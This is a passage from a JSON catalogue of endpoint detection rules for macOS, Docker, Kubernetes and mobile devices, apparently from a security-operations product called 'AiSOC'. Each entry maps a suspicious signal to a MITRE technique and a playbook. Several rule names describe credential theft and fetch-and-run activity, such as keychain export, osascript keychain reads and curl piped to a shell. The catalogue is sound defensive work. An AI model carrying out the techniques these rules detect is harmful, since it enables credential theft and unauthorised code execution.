Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1553.002" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-codesign-force-bypass.yaml" }, { "id": "det-endpoint-213", "type": "detection", "name": "security export Used Against Login Keychain", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'security export Used Against Login Keychain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "macos", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-security-export-keychain.yaml" }, { "id": "det-endpoint-214", "type": "detection", "name": "security find-generic-password Used", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'security find-generic-password Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "macos", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-security-find-generic-password.yaml" }, { "id": "det-endpoint-215", "type": "detection", "name": "login.keychain-db Read By Non-Owner UID", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'login.keychain-db Read By Non-Owner UID'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "macos", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-keychain-db-read-by-other-uid.yaml" }, { "id": "det-endpoint-216", "type": "detection", "name": "screencapture Binary Used", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'screencapture Binary Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1113" ], "log_source": "macos", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-screencapture-binary.yaml" }, { "id": "det-endpoint-217", "type": "detection", "name": "osascript Used To Read Keychain", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'osascript Used To Read Keychain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "macos", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-osascript-keychain-access.yaml" }, { "id": "det-endpoint-218", "type": "detection", "name": "defaults Wrote To com.apple.loginwindow", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'defaults Wrote To com.apple.loginwindow'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.005" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-defaults-com-apple-loginwindow.yaml" }, { "id": "det-endpoint-219", "type": "detection", "name": "iCloud Keychain Sync Toggled Off", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'iCloud Keychain Sync Toggled Off'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-icloud-keychain-toggle.yaml" }, { "id": "det-endpoint-220", "type": "detection", "name": "SystemExtension Loaded From Non-Apple Bundle", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SystemExtension Loaded From Non-Apple Bundle'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-systemextension-load-non-apple.yaml" }, { "id": "det-endpoint-221", "type": "detection", "name": "osascript do shell script with administrator privileges", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'osascript do shell script with administrator privileges'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.002", "T1548.004" ], "log_source": "macos", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-osascript-do-shell-script.yaml" }, { "id": "det-endpoint-222", "type": "detection", "name": "launchctl Loading Plist From /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'launchctl Loading Plist From /tmp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.001" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-launchctl-load-from-tmp.yaml" }, { "id": "det-endpoint-223", "type": "detection", "name": "curl Output Piped To Shell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'curl Output Piped To Shell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": "macos", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-curl-pipe-shell.yaml" }, { "id": "det-endpoint-224", "type": "detection", "name": "DYLD_INSERT_LIBRARIES Set To /tmp Or User Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DYLD_INSERT_LIBRARIES Set To /tmp Or User Path'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1574.006" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-dyld-insert-libraries.yaml" }, { "id": "det-endpoint-225", "type": "detection", "name": "com.apple.dock Modified By Non-System Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'com.apple.dock Modified By Non-System Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1547.005" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-dock-modified.yaml" }, { "id": "det-endpoint-226", "type": "detection", "name": "systemsetup Enabled Remote Login (SSH)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'systemsetup Enabled Remote Login (SSH)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021.004" ], "log_source": "macos", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-systemsetup-remote-login.yaml" }, { "id": "det-endpoint-227", "type": "detection", "name": "hyperkit Launched From Non-Standard Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'hyperkit Launched From Non-Standard Path'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1610" ], "log_source": "macos", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-hyperkit-launch-untrusted.yaml" }, { "id": "det-endpoint-228", "type": "detection", "name": "Mach-O Binary Executed From /Users/Shared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Mach-O Binary Executed From /Users/Shared'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "macos", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-binary-from-shared.yaml" }, { "id": "det-endpoint-229", "type": "detection", "name": "tccutil reset All Subsystems", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'tccutil reset All Subsystems'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-tccutil-reset-all.yaml" }, { "id": "det-endpoint-230", "type": "detection", "name": "Find My Mac Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Find My Mac Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-find-iphone-disabled.yaml" }, { "id": "det-endpoint-231", "type": "detection", "name": "Docker Daemon Listening On TCP Socket", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Docker Daemon Listening On TCP Socket'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1610" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-docker-tcp-listening.yaml" }, { "id": "det-endpoint-232", "type": "detection", "name": "Production Container Pulled From Public Registry", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Production Container Pulled From Public Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1525" ], "log_source": "docker", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-image-from-public-registry.yaml" }, { "id": "det-endpoint-233", "type": "detection", "name": "Container Pulled With :latest Tag In Production", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Pulled With :latest Tag In Production'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1525" ], "log_source": "docker", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-image-tag-latest-prod.yaml" }, { "id": "det-endpoint-234", "type": "detection", "name": "Container Started As UID 0 In Production", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Started As UID 0 In Production'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-running-as-root-prod.yaml" }, { "id": "det-endpoint-235", "type": "detection", "name": "Container Mounted Host Root Filesystem", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Mounted Host Root Filesystem'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-hostpath-mount-root.yaml" }, { "id": "det-endpoint-236", "type": "detection", "name": "Container Mounted /etc From Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Mounted /etc From Host'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-mount-etc.yaml" }, { "id": "det-endpoint-237", "type": "detection", "name": "Container Created With ReadOnlyRootFilesystem False", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Created With ReadOnlyRootFilesystem False'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-readonly-fs-disabled.yaml" }, { "id": "det-endpoint-238", "type": "detection", "name": "docker build Run On Production Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'docker build Run On Production Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1612" ], "log_source": "docker", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-build-on-host.yaml" }, { "id": "det-endpoint-239", "type": "detection", "name": "Docker-In-Docker Pattern Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Docker-In-Docker Pattern Detected'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-dind-detected.yaml" }, { "id": "det-endpoint-240", "type": "detection", "name": "Pod Created With hostNetwork: true", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created With hostNetwork: true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-hostnetwork-true.yaml" }, { "id": "det-endpoint-241", "type": "detection", "name": "Pod Created With hostPID: true", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created With hostPID: true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-hostpid-true.yaml" }, { "id": "det-endpoint-242", "type": "detection", "name": "Pod Created With hostIPC: true", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created With hostIPC: true'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-hostipc-true.yaml" }, { "id": "det-endpoint-243", "type": "detection", "name": "Pod Created With privileged Security Context", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created With privileged Security Context'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-privileged.yaml" }, { "id": "det-endpoint-244", "type": "detection", "name": "Pod Allows Privilege Escalation", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Allows Privilege Escalation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-allow-priv-esc.yaml" }, { "id": "det-endpoint-245", "type": "detection", "name": "RoleBinding Created Bound To cluster-admin ClusterRole", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'RoleBinding Created Bound To cluster-admin ClusterRole'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1098.003" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-rolebinding-cluster-admin.yaml" }, { "id": "det-endpoint-246", "type": "detection", "name": "ClusterRoleBinding To system:masters", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ClusterRoleBinding To system:masters'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1098.003" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-clusterrolebinding-system-masters.yaml" }, { "id": "det-endpoint-247", "type": "detection", "name": "Kubernetes Verb 'impersonate' Used", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Kubernetes Verb 'impersonate' Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1078.004" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-impersonate-verb.yaml" }, { "id": "det-endpoint-248", "type": "detection", "name": "MutatingWebhookConfiguration Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'MutatingWebhookConfiguration Modified'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-mutating-webhook-changed.yaml" }, { "id": "det-endpoint-249", "type": "detection", "name": "ValidatingWebhookConfiguration Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ValidatingWebhookConfiguration Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-validating-webhook-changed.yaml" }, { "id": "det-endpoint-250", "type": "detection", "name": "Pod Security Admission Mode Disabled For Namespace", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Security Admission Mode Disabled For Namespace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-security-disabled-namespace.yaml" }, { "id": "det-endpoint-251", "type": "detection", "name": "kube-apiserver Started With --anonymous-auth=true", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'kube-apiserver Started With --anonymous-auth=true'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1078.004" ], "log_source": "kubernetes", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-anonymous-auth-enabled.yaml" }, { "id": "det-endpoint-252", "type": "detection", "name": "Exec Into Pod In kube-system Namespace", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Exec Into Pod In kube-system Namespace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-exec-into-kube-system.yaml" }, { "id": "det-endpoint-253", "type": "detection", "name": "Many Secrets Read From Single Service Account", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Many Secrets Read From Single Service Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1552.007" ], "log_source": "kubernetes", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-secret-mass-read.yaml" }, { "id": "det-endpoint-254", "type": "detection", "name": "NetworkPolicy Deleted In Restricted Namespace", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'NetworkPolicy Deleted In Restricted Namespace'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-networkpolicy-deleted-restricted-ns.yaml" }, { "id": "det-endpoint-255", "type": "detection", "name": "Pod Created From Known Cryptominer Image Family", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created From Known Cryptominer Image Family'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": "kubernetes", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-runs-cryptominer-image.yaml" }, { "id": "det-endpoint-256", "type": "detection", "name": "iOS Jailbreak Detected By MDM", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'iOS Jailbreak Detected By MDM'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1404" ], "log_source": "ios", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-ios-jailbreak-detected.yaml" }, { "id": "det-endpoint-257", "type": "detection", "name": "Android Root Detected By MDM", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Android Root Detected By MDM'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1404" ], "log_source": "android", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-android-root-detected.yaml" }, { "id": "det-endpoint-258", "type": "detection", "name": "Device Marked Out Of MDM Compliance", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Device Marked Out Of MDM Compliance'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "mdm", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-mdm-out-of-compliance.yaml" }, { "id": "det-endpoint-259", "type": "detection", "name": "App Sideloaded Outside Of Managed Store", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'App Sideloaded Outside Of Managed Store'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1659" ], "log_source": "mobile", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-app-sideloaded.yaml" }, { "id": "det-endpoint-260", "type": "detection", "name": "MDM Profile Removal Attempted", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'MDM Profile Removal Attempted'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "mdm", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-mdm-removal-attempt.yaml" }, { "id": "det-endpoint-261", "type": "detection", "name": "VPN App Installed On Managed Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'VPN App Installed On Managed Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1572" ], "log_source": "mobile", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-vpn-app-installed.yaml" }, { "id": "det-endpoint-262", "type": "detection", "name": "Find My Device Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Find My Device Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "mobile", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-find-device-disabled.yaml" }, { "id": "det-endpoint-263", "type": "detection", "name": "Screen Lock Disabled On Managed Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Screen Lock Disabled On Managed Device'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "mobile", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-screen-lock-disabled.yaml" }, { "id": "det-endpoint-264", "type": "detection", "name": "iCloud Account Changed On Managed iOS Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'iCloud Account Changed On Managed iOS Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "ios", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-icloud-account-swap.yaml" }, { "id": "det-endpoint-265", "type": "detection", "name": "Google Account Changed On Managed Android Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Google Account Changed On Managed Android Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "android", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-google-account-swap.yaml" }, { "id": "det-endpoint-266", "type": "detection", "name": "Accessibility Permission Granted To Untrusted App", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Accessibility Permission Granted To Untrusted App'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1530" ], "log_source": "android", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-accessibility-permission-granted.yaml" }, { "id": "det-endpoint-267", "type": "detection", "name": "Network Proxy Configured On Managed Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Network Proxy Configured On Managed Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1556" ], "log_source": "mobile", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-network-proxy-configured.yaml" }, { "id": "det-endpoint-268", "type": "detection", "name": "Developer Mode Enabled On Managed Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Developer Mode Enabled On Managed Device'. Watch the 1 documented false-positive case before 